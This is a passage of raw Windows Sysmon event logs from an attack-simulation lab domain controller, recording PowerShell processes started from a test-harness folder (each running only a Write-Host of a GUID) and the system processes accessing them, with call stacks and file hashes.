16:51:41.902{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234909Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.902{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6D1D-603E-51AA-00000000AD01}12820C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002234908Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.902{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6D1D-603E-51AA-00000000AD01}12820C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+700132a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49ac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49a232(wow64) 154100x80000000000000002234907Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.914{05ADC7E1-6D1D-603E-51AA-00000000AD01}12820C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Comm Write-Host 43845326-abf4-46d7-b69f-7879d3f7e105C:\Users\Administrator\Downloads\AtomicTestHarnesses\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002234906Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.887{05ADC7E1-6D1D-603E-50AA-00000000AD01}15676ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002234905Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.777{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D1D-603E-50AA-00000000AD01}15676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234904Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.777{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D1D-603E-50AA-00000000AD01}15676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234903Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.723{05ADC7E1-229D-6039-0B00-00000000AD01}85214476C:\Windows\system32\lsass.exe{05ADC7E1-6D1D-603E-50AA-00000000AD01}15676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234902Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.723{05ADC7E1-229D-6039-0B00-00000000AD01}85214476C:\Windows\system32\lsass.exe{05ADC7E1-6D1D-603E-50AA-00000000AD01}15676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002234901Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:51:41.722{05ADC7E1-6D1D-603E-50AA-00000000AD01}15676\PSHost.132591775016275134.15676.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002234900Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.699{05ADC7E1-6D1D-603E-50AA-00000000AD01}15676ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_agpenx0i.t0d.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002234899Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.699{05ADC7E1-6D1D-603E-50AA-00000000AD01}15676ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_urteepv0.50u.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002234898Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.684{05ADC7E1-6D1D-603E-50AA-00000000AD01}15676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_urteepv0.50u.ps12021-03-02 16:51:41.684 10341000x80000000000000002234897Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.668{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6D1D-603E-50AA-00000000AD01}15676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234896Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.623{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6D1D-603E-50AA-00000000AD01}15676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234895Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.623{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234894Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.623{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234893Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.623{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234892Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.623{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234891Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.623{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6D1D-603E-50AA-00000000AD01}15676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002234890Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.623{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6D1D-603E-50AA-00000000AD01}15676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+700132a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49ac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49a232(wow64) 154100x80000000000000002234889Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.627{05ADC7E1-6D1D-603E-50AA-00000000AD01}15676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Com Write-Host 67820a20-2a72-4110-ab57-a57c8acad8f2C:\Users\Administrator\Downloads\AtomicTestHarnesses\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002234888Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.606{05ADC7E1-6D1D-603E-4FAA-00000000AD01}9368ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002234887Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.496{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D1D-603E-4FAA-00000000AD01}9368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234886Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.496{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D1D-603E-4FAA-00000000AD01}9368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234885Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:51:41.449{05ADC7E1-229D-6039-0B00-00000000AD01}85214476C:\Windows\system32\lsass.exe{05ADC7E1-6D1D-603E-4FAA-00000000AD01}9368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234884Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 